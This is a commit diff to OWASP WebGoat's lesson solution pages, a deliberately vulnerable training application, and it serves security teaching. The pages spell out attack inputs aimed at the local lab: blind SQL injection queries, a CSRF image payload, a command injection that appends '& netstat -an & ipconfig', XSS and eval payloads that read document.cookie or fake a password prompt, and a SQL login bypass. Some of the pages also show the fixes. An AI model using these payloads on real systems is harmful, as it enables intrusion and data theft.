* Hints added

* Solutions added
* Bugfixes
* Introduction added (including how to start with webgoat and useful tools)
* New lesson: Password strength
* New lessons: Multi Level Login
* Not yet working new lesson: Session fixation (inital release)

git-svn-id: http://webgoat.googlecode.com/svn/trunk@301 4033779f-a91e-0410-96ef-6bf7bf53c507

webgoat/main/project/WebContent/lesson_solutions/AccessControlMatrix.html

@@ -626,7 +626,7 @@ color:windowtext'>Solution</span></span><span style='font-family:"Arial","sans-s
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This exercise
 is straightforward. You need to find a user where you can access a resource
-that you shouldn<EFBFBD>t be able to access.<o:p></o:p></span></p>
+that you shouldn't be able to access.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>After a few attempts
 you will learn that Larry can access resources of the role Account Manager.<o:p></o:p></span></p>

webgoat/main/project/WebContent/lesson_solutions/BasicAuthentication.html

@@ -673,8 +673,8 @@ field-end'></span><![endif]--> Intercepted request</p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The HTTP
 header that contains the Basic Authentication information is called
-<EFBFBD>Authorization<EFBFBD>. This value Z3Vlc3Q6Z3Vlc3Q= is Base64 encoded. You can decode
-this by using WebScarab <EFBFBD> Tools <EFBFBD> Transcoder.<o:p></o:p></span></p>
+"Authorization". This value Z3Vlc3Q6Z3Vlc3Q= is Base64 encoded. You can decode
+this by using WebScarab > Tools > Transcoder.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -827,7 +827,7 @@ field-end'></span><![endif]--> Basic Authentication<span style='font-family:
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You clearly
 see that the JSESSIONID is the same like in the previous request, but the
 Authorization header now contains the Base 64 encoded value of basic:basic (you
-can decode this value in WebScarab <EFBFBD> Tools <EFBFBD> Transcoder).<o:p></o:p></span></p>
+can decode this value in WebScarab > Tools > Transcoder).<o:p></o:p></span></p>
 
 <p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
 "Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_1023"
@@ -894,7 +894,7 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now you are
 redirected to the WebGoat start page. The JSESSIONID is changed and you lost all
 your green stars because the basic user hasn<73>t completed any lesson. Go to the
-lesson <EFBFBD>Basic Authentication<EFBFBD> to complete this lesson.<o:p></o:p></span></p>
+lesson "Basic Authentication" to complete this lesson.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 

webgoat/main/project/WebContent/lesson_solutions/BlindSqlInjection.html

@@ -647,7 +647,7 @@ character using &gt; and &lt;<o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The backend
-database is Microsoft Access. Keep that in mind if you research SQL functions
+database is HSQLDB. Keep that in mind if you research SQL functions
 on the Internet since different databases use some different functions and
 syntax.<o:p></o:p></span></p>
 
@@ -670,13 +670,13 @@ query for your target data and get a string <o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>mid(string,
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>substr(string,
 start, length) - returns a substring of string starting at the start character
 and going for length characters <o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>asc(string)
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>ascii(string)
 will return the ascii value of the first character in string <o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -690,15 +690,15 @@ the first character of the first_name of userid 15613 less than 'M' (ascii 77)?
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>101 AND (asc(
-mid((SELECT first_name FROM user_data WHERE userid=15613) , 1 , 1) ) &lt; 77 );
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>101 AND (ascii(
+substr((SELECT first_name FROM user_data WHERE userid=15613) , 1 , 1) ) &lt; 77 );
 <o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you get
 back that account number is valid, then yes. If get back that the number
-isinvalid then answer is no.<o:p></o:p></span></p>
+is invalid then answer is no.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Another
 example: is the second character of the first_name of userid 15613 greater than
@@ -706,8 +706,8 @@ example: is the second character of the first_name of userid 15613 greater than
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>101 AND (asc(
-mid((SELECT first_name FROM user_data WHERE userid=15613) , 2 , 1) ) &gt; 109
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>101 AND (ascii(
+substr((SELECT first_name FROM user_data WHERE userid=15613) , 2 , 1) ) &gt; 109
 ); <o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -752,8 +752,8 @@ style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element
 field-end'></span><![endif]--> Lesson 16<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For the
-query: 101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid=15613)
-, 1 , 1) ) &lt; 77 ); you will get a <EFBFBD>Account number is valid<EFBFBD>. If the
+query: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE userid=15613)
+, 1 , 1) ) &lt; 77 ); you will get a "Account number is valid". If the
 character is bigger then the value you get an invalid account error message.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -779,7 +779,7 @@ field-end'></span><![endif]--> Invalid account number<span style='font-family:
 change the &lt; to = to make sure that you have the correct value.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This results
-in the query 101 AND (asc( mid((SELECT first_name FROM user_data WHERE
+in the query 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
 userid=15613) , 1 , 1) ) = 74 );<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -811,7 +811,7 @@ characters.<o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The query for
-the second character: 101 AND (asc( mid((SELECT first_name FROM user_data WHERE
+the second character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
 userid=15613) , 2 , 1) ) = 111 );<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Ascii(111) =
@@ -831,19 +831,19 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For the third
-character: 101 AND (asc( mid((SELECT first_name FROM user_data WHERE
+character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
 userid=15613) , 3 , 1) ) = 101 ); Ascii(101) = e<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For the
-fourth character: 101 AND (asc( mid((SELECT first_name FROM user_data WHERE
+fourth character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
 userid=15613) , 4 , 1) ) = 115 ); Ascii(115) = s<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For the fifth
-character: 101 AND (asc( mid((SELECT first_name FROM user_data WHERE
+character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
 userid=15613) , 5 , 1) ) = 112); Ascii(112) = p<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>For the sixth
-character: 101 AND (asc( mid((SELECT first_name FROM user_data WHERE
+character: 101 AND (ascii( substr((SELECT first_name FROM user_data WHERE
 userid=15613) , 6 , 1) ) = 104); Ascii(104) = h<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>

webgoat/main/project/WebContent/lesson_solutions/CSRF.html

@@ -747,7 +747,7 @@ height=&quot;1&quot; /&gt;<o:p></o:p></span></p>
 
 <p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
 mso-fareast-language:JA'>The transaction can be triggered by an URL to the
-current lesson and an extra parameter <EFBFBD>transferFunds<EFBFBD> and the amount. The
+current lesson and an extra parameter "transferFunds" and the amount. The
 width=1 and height=1 will not show the image.<o:p></o:p></span></p>
 
 <p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
@@ -758,14 +758,14 @@ mso-fareast-language:JA'>This payload will work:<o:p></o:p></span></p>
 
 <p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
 mso-fareast-language:JA'>&lt;img
-src=<EFBFBD>http://localhost/WebGoat/attack?Screen=81&amp;menu=210&amp;transferFunds=5000<EFBFBD>
+src="http://localhost/WebGoat/attack?Screen=81&amp;menu=210&amp;transferFunds=5000"
 width=&quot;1&quot; height=&quot;1&quot; /&gt;<o:p></o:p></span></p>
 
 <p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
 mso-fareast-language:JA'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif";
-mso-fareast-language:JA'>So create a new message with title <EFBFBD>Test<EFBFBD> and a
+mso-fareast-language:JA'>So create a new message with title "Test" and a
 message with the payload.<o:p></o:p></span></p>
 
 <p class=MsoNormal style='text-align:justify;page-break-after:avoid'><span

webgoat/main/project/WebContent/lesson_solutions/ClientSideFiltering.html

@@ -0,0 +1,79 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Client Side Filtering</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Client Side Filtering</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+It is always a good practice to send to the client 
+only information which they are supposed to have access to. 
+In this lesson, too much information is being sent to the 
+client, creating a serious access control problem.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+For this exercise, your mission is exploit the extraneous 
+information being returned by the server to discover information 
+to which you should not have access. 
+</p>
+
+<b>Solution:</b><br/>
+This Lab consists of two Stages. In the first Stage you have to 
+get sensitive information . In the second one you have to fix the problem.<br/>
+<h3>Stage 1</h3>
+Use Firebug to solve this stage. If you are using IE you can try it with 
+IEWatch.<br/><br/>
+
+First use any person from the list and see what you get. After doing this you 
+can search for a specific person in Firebug. Make sure you find the hidden table with
+the information, including the salary and so on. In the same table you will find
+Neville.
+<center>
+<img src="/WebGoat/lesson_solutions/ClientSideFiltering_files/clientside_firebug.jpg" alt="Clientside Filtering" />
+<font size="2"><b>Inspect HTML on Firebug</b></font>
+</center>
+<br/><br/>
+Now write the salary into the text edit box and submit your answer!
+
+<h3>Stage 2</h3>
+In this stage you have to modify the clientSideFiltering.jsp which you will find under 
+the WebContent in the lessons/Ajax folder. The Problem is that
+the server sends all information to the client. As you could see
+even if it is hidden it is easy to find the sensitive date. In this
+stage you will add a filter to the XPath queries. In this file you will find 
+following construct:<br><br>
+<code>
+	StringBuffer sb = new StringBuffer();<br>
+	
+	sb.append("/Employees/Employee/UserID | ");<br>
+	sb.append("/Employees/Employee/FirstName | ");<br>
+	sb.append("/Employees/Employee/LastName | ");<br>
+	sb.append("/Employees/Employee/SSN | ");<br>
+	sb.append("/Employees/Employee/Salary ");<br>
+	
+	String expression = sb.toString();<br>
+</code><br>
+This string will be used for the XPath query. You have to guarantee that a manger only 
+can see employees which are working for him. To archive this you can use
+filters in XPath. Following code will exactly do this:<br><br>
+<code>
+	StringBuffer sb = new StringBuffer();<br>
+	
+	sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/UserID | ");<br>
+	sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/FirstName | ");<br>
+	sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/LastName | ");<br>
+	sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/SSN | ");<br>
+	sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/Salary ");<br>
+	
+	String expression = sb.toString();<br>
+</code>
+<br><br>
+Now only information is sent to your client you are authorized for. You can click on the button.
+<br><br>
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/ClientSideValidation.html

@@ -0,0 +1,63 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Insecure Client Storage</title>
+<link rel="stylesheet" type="text/css"
+	href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Insecure Client Storage</p>
+
+<p><b>Concept / Topic To Teach:</b><br />
+It is always a good practice to validate all input
+ on the server side. Leaving the mechanism for validation 
+ on the client side leaves it vulnerable to reverse engineering. 
+ Remember, anything on the client side should not be considered a secret.</p>
+
+
+
+<p><b>General Goal(s):</b><br />
+For this exercise, your mission is to discover a coupon 
+code to receive an unintended discount. Then, exploit the use 
+of client side validation to submit an order with a cost of zero. </p>
+
+<p><b>Solution:</b><br />
+For the solution you need a plugin for your browser, which is capable of debugging
+Javascript. For IE you can use IEWatch. This solution is written for Firebug
+which is a plugin for Firefox.
+</p>
+
+<h2>Stage 1</h2>
+<p>
+First we want to try to get a coupon code to get something cheaper. Open 
+Firebug and click on the Script Tab. Make sure you choose clientSideValidation.js
+on the dropdown list. Toggle a breakpoint on the line:<br/>
+<code>decrypted = decrypt(coupons[i]);</code></p>
+Now enter a character in the coupon code field. The Javascript gets executed
+but stops at the breakpoint. On the right side you see the parameters
+and there values. Now use the step over symbol or F10. Now you can read
+the clear text of decrypted:
+<center>
+<img src="/WebGoat/lesson_solutions/ClientSideValidation_files/ClientSideValidation_stage1.png" width=450px alt="Stage 1" />
+<b>Figure 1 Firebug in action</b>
+</center>
+<p>
+Now that you know the coupon name enter it in the coupon field, purchase something
+and you are done.
+</p>
+
+<h2>Stage 2</h2>
+<p>
+You can not edit the Prices in the Shopping Cart. The reason is that the readonly 
+attribute is set for this field. 
+</p>
+<p>To get rid of this attribute open Firebug. Make sure this time you use
+the HTML View. You can directly in 
+Firebug search for readonly and elemenate this attribute.The field for the total is
+called GRANDTOT. After having deleted the readonly attribute from GRANDTOT
+it is possible to change the price directly in the browser. Select any products
+you like, change the total field to 0 and hit the purchase button.</p>
+
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/CommandInjection.html

@@ -662,7 +662,7 @@ style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
 style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Select a
-lesson from the drop-down box and click on <EFBFBD>View<EFBFBD>.<o:p></o:p></span></p>
+lesson from the drop-down box and click on "View".<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -677,9 +677,9 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Intercept the
-request with WebScarab when you click on <EFBFBD>View<EFBFBD>. Append <EFBFBD> &amp; netstat <EFBFBD>an
-&amp; ipconfig to the HelpFile parameter. Do not forget the double quote!<o:p></o:p></span></p>
+<p><span style='font-family:"Arial","sans-serif"'>Intercept the
+request with WebScarab when you click on "View". Append " &amp; netstat &minus;an
+&amp; ipconfig"to the HelpFile parameter. Do not forget the double quote!<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 

webgoat/main/project/WebContent/lesson_solutions/ConcurrencyCart.html

@@ -0,0 +1,32 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Shopping Cart Concurrency Flaw</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Shopping Cart Concurrency Flaw</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+Web applications can handle many HTTP requests simultaneously.  Developers often use variables that are not thread safe. &nbsp;Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently. <br>
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price.
+</p>
+
+<b>Solution:</b><br/><br/>
+1. Open a new browser window on the same page.<br/><br/>
+2. In window A you choose a low cost item and click "Purchase".<br/><br/>
+<img src="/WebGoat/lesson_solutions/ConcurrencyCart_files/image001.jpg"><br/>
+<font size="2"><b>Window A</b></font><br/><br/><br/>
+3. In window B you choose the a high cost item you want to buy and click "update cart". The variable of the price has been overwritten now.<br/><br/>
+<img src="/WebGoat/lesson_solutions/ConcurrencyCart_files/image002.jpg"><br/>
+<font size="2"><b>Window B</b></font><br/><br/><br/>
+4. In window A you can click click "Confirm" and you bought your item for a lower price.<br/><br/>
+<img src="/WebGoat/lesson_solutions/ConcurrencyCart_files/image003.jpg"><br/>
+<font size="2"><b>Window A Success</b></font><br/>
+<br><br><br>
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/DOMInjection.html

@@ -756,7 +756,7 @@ intercepting the HTTP response in WebScarab!<o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Enter a
-license key (for example <EFBFBD>a<EFBFBD>) and intercept the HTTP Request and HTTP Response
+license key (for example 'a') and intercept the HTTP Request and HTTP Response
 in WebScarab.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>

webgoat/main/project/WebContent/lesson_solutions/DOMXSS.html

@@ -0,0 +1,51 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>DOM Based Cross Site Scripting (XSS)</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> DOM Based Cross Site Scripting (XSS)</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+The Document Object Model (DOM) presents an interesting problem from a security standpoint. It allows the content of a web page to be dynamically modified, but that can be abused by attackers during a malicious code injection. XSS, a type of malicious code injection, can occur when unvalidated user input is used directly to modify the content of a page on the client side. <br>
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+For this exercise, your mission is to use this vulnerability to inject malicious code into the DOM. Then in the last stage, you will correct the flaws in the code to address the vulnerability. 
+</p>
+
+<b>Solution:</b><br/><br/>
+Stage 1: Enter "&lt;IMG SRC="images/logos/owasp.jpg"/&gt;" and submit the solution.<br/><br/>
+<img src="/WebGoat/lesson_solutions/DOMXSS_files/image001.jpg"><br/>
+<font size="2"><b>Stage 1 result</b></font><br/><br/><br/>
+Stage 2: Enter "&lt;img src=x onerror=;;alert('XSS') /&gt;" and submit the solution.<br/><br/>
+<img src="/WebGoat/lesson_solutions/DOMXSS_files/image002.jpg"><br/>
+<font size="2"><b>Stage 2 result</b></font><br/><br/><br/>
+Stage 3: Enter "&lt;IFRAME SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;" and submit the solution.<br/><br/>
+<img src="/WebGoat/lesson_solutions/DOMXSS_files/image003.jpg"><br/>
+<font size="2"><b>Stage 3 result</b></font><br/><br/><br/>
+Stage 4: Enter "Please enter your password:&lt;BR&gt;&lt;input type = "password" name="pass"/&gt;&lt;button onClick="javascript:alert('I have your password: ' + pass.value);"&gt;Submit&lt;/button&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt; &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;" and submit the solution.<br/><br/>
+<img src="/WebGoat/lesson_solutions/DOMXSS_files/image004.jpg"><br/>
+<font size="2"><b>Stage 4 result</b></font><br/><br/><br/>
+Stage 5: You have to use the JavaScript escape.js for the input.<br/>
+You will find the JavaScripts in tomcat\webapps\WebGoat\javascript ( Standart Version ) or in WebContent\javascript ( Developer Version ).<br/>
+Open the JavaScript DOMXSS.js<br/><br/><br/>
+<i>function displayGreeting(name) {<br/>
+	if (name != ''){<br/>
+		document.getElementById("greeting").innerHTML="Hello, " + </i><b>name</b><i> + "!";<br/>
+	}<br/>
+}</i><br/>
+<br/>
+You have to change this to:<br/><br/>
+<i>function displayGreeting(name) {<br/>
+	if (name != ''){<br/>
+		document.getElementById("greeting").innerHTML="Hello, " + </i><b>escapeHTML(name);</b><i> + "!";<br/>
+	}<br/>
+}</i><br/>
+<br/>
+The attacks will no longer work.
+<br><br><br>
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/DOS_Login.html

@@ -623,7 +623,7 @@ of 3 logins.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Let<EFBFBD>s try a
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Let's try a
 SQL Injection attack. Enter in the password field ' or '1' = '1<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>

webgoat/main/project/WebContent/lesson_solutions/DangerousEval.html

@@ -0,0 +1,28 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Dangerous Use of Eval</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Dangerous Use of Eval)</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+It is always a good practice to validate all input on the server side. XSS can occur when unvalidated user input is reflected directly into an HTTP response. In this lesson, unvalidated user-supplied data is used in conjunction with a Javascript eval() call. In a reflected XSS attack, an attacker can craft a URL with the attack script and store it on another website, email it, or otherwise trick a victim into clicking on it. 
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+For this exercise, your mission is to come up with some input which, when run through eval, will execute a malicious script. In order to pass this lesson, you must 'alert()' document.cookie. 
+</p>
+
+<b>Solution:</b><br/>
+The value of the digit access code field is placed in the Javascript eval() function. This is the reason why your attack will not require the "&lt;script&gt;" tags.<br/>
+Enter: 123');alert(document.cookie);('<br/><br/>
+The result on the server is:<br/><br/>
+ eval('<font color="#ff0000">123');<br/>
+alert(document.cookie);<br/>
+('</font>');
+<br><br><br>
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/Encoding.html

@@ -0,0 +1,22 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Encoding Basics</title>
+<link rel="stylesheet" type="text/css" href="/WebGoat/lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+Different encoding schemes can be used in web applications for different reasons. 
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+This lesson will familiarize the user with different encoding schemes. 
+</p>
+
+<b>Solution:</b><br/>
+Enter the string "abc". In the List below you see the encoded value of the string. For rot13 encoding this is "nop". Now enter a string "a c" and have a look on the url encoding.<br><br><br>
+</body>
+</html>

webgoat/main/project/WebContent/lesson_solutions/FailOpenAuthentication.html

@@ -597,7 +597,7 @@ style='font-family:"Arial","sans-serif"'> Abusing error handling.<o:p></o:p></sp
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This lesson presents
 the basics for understanding the &quot;fail open&quot; condition regarding
-authentication. The security term, <EFBFBD>fail open<EFBFBD> describes a behavior of a
+authentication. The security term, "fail open" describes a behavior of a
 verification mechanism. This is when an error (i.e. unexpected exception)
 occurs during a verification method causing that method to evaluate to true.
 This is especially dangerous during login. <o:p></o:p></span></p>
@@ -653,7 +653,7 @@ style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Enter user
-name webgoat and click <EFBFBD>Login<EFBFBD>. Intercept the request with WebScarab.<o:p></o:p></span></p>
+name webgoat and click "Login". Intercept the request with WebScarab.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -675,7 +675,7 @@ field-end'></span><![endif]--> Intercepted request<span style='font-family:
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click on the
-variable <EFBFBD>Password<EFBFBD> and click <EFBFBD>Delete<EFBFBD>. Click <EFBFBD>Accept changes<EFBFBD>.<o:p></o:p></span></p>
+variable "Password" and click "Delete". Click "Accept changes".<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -696,7 +696,7 @@ field-end'></span><![endif]--> Password variable is deleted</p>
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You are now
-<EFBFBD>authenticated<EFBFBD> as WebGoat.<o:p></o:p></span></p>
+"authenticated" as WebGoat.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 

webgoat/main/project/WebContent/lesson_solutions/ForgotPassword.html

@@ -664,7 +664,7 @@ field-end'></span><![endif]--> Lesson 10</p>
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>When you
-enter the user name webgoat and then the answer <EFBFBD>red<EFBFBD> for your favorite color,
+enter the user name webgoat and then the answer "red" for your favorite color,
 you will get a password reminder, only not via e-mail.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
@@ -713,7 +713,7 @@ Wingdings'>J</span></span><span style='font-family:"Arial","sans-serif"'><o:p></
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now you need
 to guess the password for another user. The text tells you something about an
-<EFBFBD>OWASP admin<EFBFBD>. So let<65>s try <EFBFBD>admin<EFBFBD> for a user name.<o:p></o:p></span></p>
+"OWASP admin". So let<65>s try "admin" for a user name.<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 

webgoat/main/project/WebContent/lesson_solutions/HiddenFieldTampering.html

@@ -581,8 +581,8 @@ style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
 hidden field you need to start your favorite HTTP Interceptor. You can use
 WebScarab from OWASP to intercept the request and change the hidden field.
 Configure your browser to use a local proxy. In Internet Explorer you can do
